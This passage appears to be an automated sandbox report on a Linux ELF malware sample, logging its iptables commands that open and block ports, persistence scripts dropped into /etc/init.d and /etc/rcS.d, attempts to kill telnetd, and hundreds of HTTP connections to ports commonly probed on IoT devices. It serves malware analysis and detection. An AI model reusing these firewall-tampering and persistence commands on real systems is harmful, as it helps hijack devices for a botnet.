Source: /tmp/bin.sh.elf (PID: 6421)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 60815 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6427)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6433)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPT"	Jump to behavior

Source: /bin/sh (PID: 6275)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6282)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6285)	Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6290)	Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6293)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6296)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6299)	Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6302)	Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6328)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6331)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6334)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6337)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6344)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6347)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6350)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6353)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6356)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6359)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6366)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6369)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6377)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6380)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6387)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6393)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6401)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6404)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6407)	Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6414)	Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6420)	Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6426)	Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6432)	Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6438)	Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPT	Jump to behavior

Source: /usr/bin/dash (PID: 6219)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.xtr71Z5d7V /tmp/tmp.6BCIrgckW3 /tmp/tmp.FznSbp6tJ4			Jump to behavior
Source: /usr/bin/dash (PID: 6228)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.xtr71Z5d7V /tmp/tmp.6BCIrgckW3 /tmp/tmp.FznSbp6tJ4			Jump to behavior

Source: /tmp/bin.sh.elf (PID: 6261)

Reads from proc file: /proc/stat

Jump to behavior

Source: /tmp/bin.sh.elf (PID: 6244)	File: /usr/networks (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/bin.sh.elf (PID: 6244)

File written: /usr/networks

Jump to dropped file

Source: /tmp/bin.sh.elf (PID: 6244)	Shell script file created: /etc/rcS.d/S95baby.sh			Jump to dropped file
Source: /tmp/bin.sh.elf (PID: 6244)	Shell script file created: /etc/init.d/S95baby.sh			Jump to dropped file

Source: submitted sample

Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/init.d/S95baby.sh	Jump to dropped file
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/bin.sh.elf (PID: 6244)	File: /usr/bin/gettext.sh	Jump to dropped file
Source: /tmp/bin.sh.elf (PID: 6244)	File: /usr/bin/rescan-scsi-bus.sh	Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 55170 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33862 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 57246 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 50476 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 34956 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 42656 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 53386 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37290 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 53460 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53152 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 46644 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 56416 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 32770 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56786 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 49462 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 42460 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 34158 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 55426 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 34592 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 48832 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41512 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48810 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 60062 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 54916 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 40736 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 54474 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 39080 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 56834 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49334 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 51128 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 47196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51090 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 60498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50342 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47266 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34698 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 54360 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 60268 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40872 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 44094 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 58788 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37558 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 50614 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50966 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 34526 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44616 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 36296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56402 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 49388 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 46276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38626 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 34686 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 43986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35766 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59794 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 38618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54792 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 55294 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 60714 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 36632 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 52560 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 44238 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 53554 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 40020 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 39706 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44322 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 56664 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37722 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52506 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 35628 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48112 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 60778 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 42750 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 36116 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48768 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 53434 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36702 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42466 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 48570 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 40158 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 43418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34658 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 48726 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 39538 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55572 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 33374 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 55508 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 59782 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 50698 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 34298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36608 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 47068 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 44886 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39688 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 40018 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 51364 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35312 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52432 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 43402 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34066 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 56088 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 59688 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 37608 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50660 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 48846 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 60010 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 55030 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49060 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59674 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44448 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 52900 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 43532 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 60140 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 45422 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48626 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 45656 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45596 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 43880 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 43958 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39428 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 48312 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 41518 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40154 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 40196 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45114 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 59424 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 41272 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 42548 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 60776 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 37724 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34628 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 39656 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 38284 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 54284 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 44394 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 44166 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50630 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 42854 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 53612 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 57450 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 44056 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 60002 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 53354 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 48974 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 41324 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 52684 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35616 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45496 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 53778 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 51038 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 54604 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 60844 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 42354 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 40806 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 35144 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 40192 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 54634 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 35108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46152 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52986 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52390 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 60010 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48438 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 41060 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 50664 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56158 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 34918 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 32944 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55158 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 58314 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 60376 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 45890 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 39998 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34878 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42772 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 35580 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 51652 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 60476 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 39566 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46480 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52416 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39552 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 51036 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 47010 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 38028 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51176 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 35580 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 45924 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 36814 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 43140 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 41862 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 51534 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 59094 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 32962 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 57848 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 48938 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 41766 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 35750 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 38332 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55162 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 44994 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 41838 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 41154 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 41548 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 49106 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 33322 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 54972 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46566 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 51756 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53140 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 44560 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54308 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 35620 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 40358 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 37510 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43296 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 33188 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39368 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45414 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 34304 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 60006 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49412 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36202 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 53644 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39746 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 60674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43582 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55736 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45748 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 58586 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 43462 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 33110 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 47508 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36988 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 50712 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 54156 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 53132 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49046 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 56752 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 38508 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 45316 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 55040 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46662 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43836 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 47488 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 55338 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 57684 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 47342 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 60802 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 59396 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 49346 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42380 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 54502 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 42546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36150 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 42708 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44144 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 59526 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 33998 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 58790 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49396 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 37714 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 60546 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 41122 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 38514 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 34022 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 56744 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50578 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 59942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55994 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 33796 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 44686 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 60346 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 40850 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46068 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58286 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 35292 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 39496 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45210 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52046 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 37048 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 33060 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 45990 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 39538 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55058 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43144 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 57418 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 36874 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 38780 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39452 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 51612 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39348 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 56050 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60678 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 38752 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 54166 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 43390 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 48328 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 41758 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 53268 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50798 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 48672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60798 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 48668 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 41596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52134 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 43492 -> 7574
